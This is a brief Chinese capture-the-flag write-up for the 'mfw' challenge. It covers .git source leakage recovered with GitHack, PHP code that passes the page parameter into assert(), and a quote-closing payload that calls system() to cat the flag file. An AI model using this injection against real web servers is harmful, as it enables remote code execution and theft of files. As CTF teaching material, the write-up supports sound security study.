mfw (这有啥含义吗??)
右键查看源码
<!--<li class="active"><a href="?page=flag">My secrets</a></li> -->
得知要读取flag文件内容
提示git
是.git文件泄露
使用githack扫描得出源码
重要源码如下
<?phpif (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
有assert函数可以进行命令执行
构造闭合
strpos('templates/a')or system("cat /templates/flag.php");//.php
这就是payload
右键查看源码得到flag